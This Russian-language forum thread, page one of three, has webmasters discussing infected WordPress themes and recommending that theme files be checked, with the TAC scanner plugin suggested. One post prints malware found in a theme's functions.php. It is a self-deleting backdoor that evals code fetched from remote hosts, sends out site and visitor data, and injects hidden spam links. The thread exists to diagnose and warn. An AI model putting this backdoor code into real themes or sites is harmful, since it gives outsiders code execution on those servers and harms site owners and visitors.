Возможно спрошу глупость, а все смотрят файлы темы пере установкой ее на Wordpress.

(Ответов: 20, Просмотров: 1901)
Страница 1 из 3 123 Последняя
  1. Студент
    • Регистрация: 12.01.2010
    • Сообщений: 42
    • Репутация: 16
    Собственно к чему я это решил спросить, я тут не давно столкнулся с такой бедой что в месте с темой на сайт прописывается зловред который потом добавляет скрытые ссылки на страницы сайта, вещь излечимая но все же не приятная.

    Кто нибудь сталкивался с такой бедой?
    • 0
  2. Во все тяжкие Аватар для CuxpecT
    • Регистрация: 14.06.2011
    • Сообщений: 2,324
    • Репутация: 2030
    • Webmoney BL: ?
    насколько я помню с чем-то подобным сталкивался 13-й
    P.s. сам вп почти не использую, поэтому не смотрю
    бох смм
    • 0
  3. Студент
    • Регистрация: 10.02.2009
    • Сообщений: 91
    • Репутация: 6
    • Webmoney BL: ?
    Шаблон с офф. сайта или какого то варезника?
    • 0
  4. $500/day Аватар для lexxx
    • Регистрация: 14.12.2011
    • Сообщений: 606
    • Репутация: 179
    Я, например, ВСЕ файлы шаблона проверяю перед установкой новой темы.
    Во-первых, для проверки темы на "злой" код, во-вторых, для исправления ошибок автора темы.
    А вообще, темы нужно проверять 100%. Очень много в инете зараженных тем.
    • 0
  5. Студент
    • Регистрация: 12.01.2010
    • Сообщений: 42
    • Репутация: 16
    itup, ну тема вроде позиционировалась как бесплатная. Как на в самом деле хз.
    • 0
  6. Студент
    • Регистрация: 27.11.2012
    • Сообщений: 76
    • Репутация: 9
    есть специальный плагин для проверки тем, как называется не помню (если найду, скину ссылку), проверяет на левые ссылки и остальное
    • 0
  7. Студент
    • Регистрация: 12.01.2010
    • Сообщений: 42
    • Репутация: 16
    В общем может кому пригодится, я тут немного по исследовал данный вопрос, во что получается.

    Чаще всего зловред обитает в файле functions.php, а именно:

    PHP код:
    add_action('after_setup_theme''_theme_setup');
    function 
    _theme_setup(){    
        
    $value 'return eval(file_get_contents(\'http://wpru.ru/aksimet.php?id=\'.$post->ID.\'&m=46&n\'));';
        
    add_option('blogoption'$value'''yes');
        
    //selfterminate
        
    $functions file_get_contents(TEMPLATEPATH.'/functions.php');    
        
    $p1 substr($functions0strpos($functions'//beginXX'));
        
    $p2 end(explode('//endXX'$functions));
        
    file_put_contents(TEMPLATEPATH.'/functions.php'$p1.$p2);
    }

    add_filter('the_content''_bloginfo'10001);
    function 
    _bloginfo($content){
        global 
    $post;
        if(
    is_single() && ($co=@eval(get_option('blogoption'))) !== false){
            return 
    $co;
        } else return 
    $content;

    После активации темы он видимо меняет это код на код следующего характера, так как на зараженных сайтах код что выше отсутствовал, за то был такой:

    PHP код:
    function wp_footer_() {
    return @eval(
    get_option('blogoption'));

    Так же на зараженных сайтах если выполнить запрос к базе:
    PHP код:
    SELECT FROM `wp_optionsWHERE `option_name` = 'blogoption' 
    Результат был такой:
    PHP код:
    global $post;return eval(file_get_contents('http://mytestlabs.com/wp5.php?ag='.strpos($_SERVER['HTTP_USER_AGENT'],'yahoo').'&p404='.is_404().'&p_id='.$post->ID.'&single='.(is_single()||is_page()).'&perm='.get_permalink().'&site='.$_SERVER['HTTP_HOST'].'&page='.$_SERVER['REQUEST_URI'].'&ip='.getenv('REMOTE_ADDR'))); 
    Выводился эта беда в footer.php функцией wp_footer_(); как видно очень похожей на родную.

    Весь этот зловред плодил на сайте скрытые ссылки, при просмотре их не было видно они скрывались с помощью css.

    После удаления этого кода ссылки пропали.

    ---------- Сообщение добавлено 12:03 ---------- Предыдущее 12:01 ----------

    vorons, а он проверяет до активации темы или уже непосредственно активированную тему на сайте?

    ---------- Сообщение добавлено 12:07 ---------- Предыдущее 12:03 ----------

    lexxx, теперь я тоже :)
    • 0
  8. Студент
    • Регистрация: 27.11.2012
    • Сообщений: 76
    • Репутация: 9
    voffka_m,
    а он проверяет до активации темы или уже непосредственно активированную тему на сайте?
    насчетт этого честно незнаю, я его сам не проверял т.к. с wp не работаю
    • 0
  9. Студент
    • Регистрация: 09.04.2010
    • Сообщений: 86
    • Репутация: 8
    я пользуюсь плагином TAC. Ссылка на wordpress.org
    Плагин TAC ищет в коде шаблона зашифрованные внешние ссылки, которые оставляют создатели шаблонов для продвижения своих сайтов.

    Установка плагина TAC. В админке блога находим раздел Плагины — нажимаем Добавить новый — и в открывшемся окне вводим в строку поиска его название: TAC.

    Устанавливаем плагин TAC и активируем его. Для открытия страницы плагины найдите в разделе Внешний вид — нажмите TAC. Откроется страница на которой будут представлены результаты поиска закодированных ссылок в шаблоне по всем установленным темам на сайте
    • 3

    Спасибо сказали:

    donoway(07.12.2012), Orcstation(07.12.2012), voffka_m(07.12.2012),
  10. Дипломник Аватар для donoway
    • Регистрация: 07.11.2011
    • Сообщений: 116
    • Репутация: 21
    Я не проверял раньше. Но недавно, заметил в одном шаблоне wp скрытые ссылки, теперь смотрю. Будьте внимательны! :)

    Werdik, спасибо за плагин!
    • 0
Страница 1 из 3 123 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Проблема с WordPress- файлы .apk
WordPress 4 16.10.2013 15:27
Помогите с установкой слайдера на wordpress
WordPress 3 03.12.2012 10:08
Проблема с установкой Wordpress
Web программирование 5 26.04.2011 11:36
Проблема с установкой плагина SimpleModal Login для WordPress
Web программирование 0 12.04.2011 14:32
Как объединить Css и Javascript файлы в Wordpress
Дайджест блогосферы 8 23.01.2010 12:51

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры